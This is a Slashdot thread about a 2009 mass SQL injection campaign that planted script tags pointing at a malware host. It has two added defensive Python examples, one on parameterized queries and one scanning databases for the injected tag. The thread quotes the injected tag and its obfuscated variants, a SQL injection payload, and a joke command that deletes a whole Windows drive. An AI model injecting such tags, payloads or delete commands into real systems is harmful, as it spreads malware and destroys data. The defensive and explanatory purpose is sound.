SQL Injection Attack Claims 132,000+
An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."
Windoze (Score:1, Informative)
Doesn't say what systems are affected by this SQL Injection.
All I can tell (from TFA), is it affects Windows servers.
The real problem (Score:2, Informative)
So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:
Observed exploits include:
* Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
* MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
* Microsoft Office Web Components vulnerabilities described in MS09-043
* Microsoft video ActiveX vulnerability described in MS09-032
* Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.
Re:Windoze (Score:5, Informative)
All I can tell (from TFA), is it affects Windows servers.
SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Re:Windoze (Score:3, Informative)
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.
Obvious, but needs to be said (Score:4, Informative)
127.0.0.1 318x.com
And you should be safe, for the moment.
Re:How is SQL involved? (Score:1, Informative)
How the hell is this +1 informative? If you comprehended (step 2, after read) the article, you would understand that you have listed the client-side exploits used by the payload delivered by the SQL injection. You have not addressed the grandparent, who CLEARLY (as in, in the title AND single line of content) requested more information regarding host profiles that may have been affected by the SQL injection itself.
Re:How is SQL involved? (Score:2, Informative)
On the server end there is a SQL injection exploit being used to get the malicious code out there.
My point being that you don't need to do a SQL injection to do this.
To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.
To prevent a HTML+script injection, you need to change < to &lt;, > to &gt;, & to &amp; etc. on input from the user that you render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into a comment or some other user field. This has nothing to do with SQL.
Re:Details? (Score:2, Informative)
They didn't mention it because it doesn't matter. It's the result of bad coding practices. A SQL injection attack is caused by the front end application accepting whatever input it's given and using it to generate the SQL statements. You stop these attacks by sanitizing your input, using stored procedures to do the database work, and possibly sticking in a middleware tier to handle database access, i.e. apache -> websphere -> database.
Re:Windoze (Score:1, Informative)
True, but the flash exploit is available on anything with flash it looks like (not updated, of course), so the only thing saving Linux/Mac/Sun users is lack of interest on the part of the malware writers.
Re:why don't these go away? (Score:3, Informative)
You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.
Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.
Even the hosting companies [softlayer.com] that claim [softlayer.com] to be anti-spam, and whose acceptable use policies state that ANY support of spam, including hosting spamvertized web sites [softlayer.com], is a violation, when confronted with multiple, on-going violations [winehq.org], will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.
Re:Let's say it all together now... (Score:4, Informative)
validate your SQL inputs before posting them against an Internet-facing database.
Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting their own parameters into your SQL statement (like, say, someone else's userID), but that's a different class of vulnerability.
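An added worked example (not code from the thread or from the article) putting the two points above side by side: the "change ' to ''" approach versus bound parameters, and SQL injection versus the separate HTML/script injection that the injected iframe tag represents. The schema, the sample rows and the `comments` table name are constructed for the demonstration; the only thing taken from the page is the injected script tag. It runs against an in-memory SQLite database.

```python
"""SQL injection vs. HTML injection, and quote-doubling vs. bound parameters.

Added example for this thread. The 'comments' table and its rows are
constructed sample data; SCRIPT_TAG is the tag the article reports as injected.
"""
import html
import sqlite3

SCRIPT_TAG = "<script src=http://318x.com></script>"


def make_db():
    """Constructed sample data: a tiny forum comments table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO comments (author, body) VALUES (?, ?)",
        [("alice", "first post"), ("bob", "second post")],
    )
    return conn


def quote_escape(value):
    """The thread's advice: double every single quote in user input."""
    return value.replace("'", "''")


def by_author_concat(conn, author, escape=False):
    """String-built query in a quoted context. Quote doubling does defeat the
    classic ' OR '1'='1 payload here, but only because the value is quoted."""
    if escape:
        author = quote_escape(author)
    sql = "SELECT id FROM comments WHERE author = '%s'" % author
    return [row[0] for row in conn.execute(sql)]


def by_id_concat(conn, id_text, escape=False):
    """String-built query in a numeric context: there is no quote to break out
    of, so quote doubling changes nothing and the payload still runs."""
    if escape:
        id_text = quote_escape(id_text)
    sql = "SELECT id FROM comments WHERE id = %s" % id_text
    return [row[0] for row in conn.execute(sql)]


def by_author_param(conn, author):
    """Bound parameter: the driver sends the value separately from the SQL text."""
    return [row[0] for row in conn.execute("SELECT id FROM comments WHERE author = ?", (author,))]


def by_id_param(conn, id_text):
    """Bound parameter plus a type check; non-numeric input never reaches the database."""
    try:
        id_value = int(id_text)
    except ValueError:
        return None
    return [row[0] for row in conn.execute("SELECT id FROM comments WHERE id = ?", (id_value,))]


def store_comment(conn, author, body):
    """Parameterized INSERT stores the body verbatim. That is correct for SQL,
    but the script tag is now sitting in the database waiting to be rendered."""
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    return conn.execute("SELECT body FROM comments WHERE author = ?", (author,)).fetchone()[0]


def render_unescaped(body):
    """Templating the stored body straight into HTML: the tag executes in the browser."""
    return "<p>%s</p>" % body


def render_escaped(body):
    """Output encoding at the HTML boundary, independent of what the SQL layer did."""
    return "<p>%s</p>" % html.escape(body, quote=True)


def demo():
    """Run every variant once and return the results as a dict."""
    conn = make_db()
    payload = "' OR '1'='1"
    stored = store_comment(conn, "mallory", SCRIPT_TAG)
    return {
        "concat_no_escape": by_author_concat(conn, payload),
        "concat_escaped": by_author_concat(conn, payload, escape=True),
        "param": by_author_param(conn, payload),
        "numeric_concat_escaped": by_id_concat(conn, "1 OR 1=1", escape=True),
        "numeric_param_ok": by_id_param(conn, "1"),
        "numeric_param_rejected": by_id_param(conn, "1 OR 1=1"),
        "stored_body": stored,
        "rendered_unescaped": render_unescaped(stored),
        "rendered_escaped": render_escaped(stored),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-24s %r" % (key, value))
```

The point of the numeric case is the one the thread glosses over: escaping quotes only helps where the value is quoted, whereas a bound parameter (and a type check) works regardless of context. The point of the rendering functions is the one the "How is SQL involved?" reply makes: once the tag is in the database, whether by SQL injection or by a plain form post, only output encoding at the HTML boundary stops it.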
Re:Windoze (Score:2, Informative)
Only easy when using sane languages.
But it used to be very difficult to do the right thing with PHP.
The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.
See: http://php.net/manual/en/function.mysql-real-escape-string.php [php.net]
Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).
And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_really" ;).
But why didn't they just copy other people and introduce stuff like PDO right at the start?
Re:AV Detection (Score:3, Informative)
according to TFA:
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.
Re:Details? (Score:3, Informative)
They didn't mention it because it doesn't matter. Its the result of bad coding practices.
It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. A lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.
Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are affected and whether the operating system makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that; surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.
Re:SQL injection portability (Score:3, Informative)
For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.
Re:hey (Score:3, Informative)
That one is outdated. What he needs is "rd /s/q C:\".
Re:Probably the Asprox botnet. (Score:3, Informative)
I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like DotNetNuke. The occasional ColdFusion page also has me wondering.
From the first page of a google search for "<script src=http://318x.com></script>":
City of Iowa City<script src=http://318x.com></script> - How to ... /default/templates/top2.asp, line 60.
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'.
www.icgov.org/default/?id=1787
YEMEN TIMES : Education ...
Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script>
www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached
IWCS - Learning<script src=http://318%78.com></script><script src ... ...
Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script
www.iwcs.com/category.cfm?Category=2932
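The search results above show what the injected content looks like once it is sitting in a site's database: the same tag appended to page titles and category names, sometimes with percent-encoded characters (`318%78.com`, `318x.%63om`) so that a naive string match for `318x.com` misses it. The following is an added example, not code from the thread or the article, of a scanner a webmaster could run over exported text columns to find and strip the tag. The row tuples are constructed to resemble the three results quoted above; table and column names are invented for the illustration, and the only real datum is the domain.

```python
"""Find injected <script src=...> tags pointing at a known bad host in stored
text, normalising percent-encoding so obfuscated variants are caught too.

Added example. SAMPLE_ROWS is constructed after the search results quoted in
the thread; the table/column names are made up for the demonstration.
"""
import re
from urllib.parse import unquote

SUSPECT_HOST = "318x.com"  # domain named in the article

# <script src=URL></script>, with or without quotes/whitespace around the URL
TAG_RE = re.compile(
    r"<script\s+src\s*=\s*[\"']?\s*(?P<url>[^\s\"'>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

# (table, column, primary key, value) as they might come out of a DB export
SAMPLE_ROWS = [
    ("pages", "title", 1787, 'City of Iowa City<script src=http://318x.com></script>'),
    ("pages", "title", 57,
     'Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script>'),
    ("categories", "name", 2932,
     'Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script>'),
    ("pages", "title", 1, "A clean page title"),
]


def normalize_url(url):
    """Percent-decode until stable (handles double encoding), then lowercase."""
    prev = None
    while prev != url:
        prev, url = url, unquote(url)
    return url.lower()


def host_of(url):
    """Hostname of an absolute or protocol-relative URL, or None."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url)
    return m.group(1) if m else None


def is_suspect_host(host):
    return host == SUSPECT_HOST or host.endswith("." + SUSPECT_HOST)


def find_injected_tags(text):
    """Return [(raw_tag, normalized_host)] for script tags loading from SUSPECT_HOST."""
    hits = []
    for m in TAG_RE.finditer(text):
        host = host_of(normalize_url(m.group("url")))
        if host and is_suspect_host(host):
            hits.append((m.group(0), host))
    return hits


def strip_injected_tags(text):
    """Remove the offending tags, leaving the original content untouched."""
    def keep_or_drop(m):
        host = host_of(normalize_url(m.group("url")))
        return "" if host and is_suspect_host(host) else m.group(0)
    return TAG_RE.sub(keep_or_drop, text)


def scan_rows(rows):
    """Return one finding per affected row: (table, column, pk, hit_count, cleaned_value)."""
    findings = []
    for table, column, pk, value in rows:
        hits = find_injected_tags(value)
        if hits:
            findings.append((table, column, pk, len(hits), strip_injected_tags(value)))
    return findings


if __name__ == "__main__":
    for table, column, pk, count, cleaned in scan_rows(SAMPLE_ROWS):
        print("%s.%s pk=%s: %d tag(s); cleaned=%r" % (table, column, pk, count, cleaned))
```

Cleaning the rows is only the visible half of the job: the tag came in through some input the application concatenated into SQL, and until that is fixed the next run of the automated attack will put it straight back.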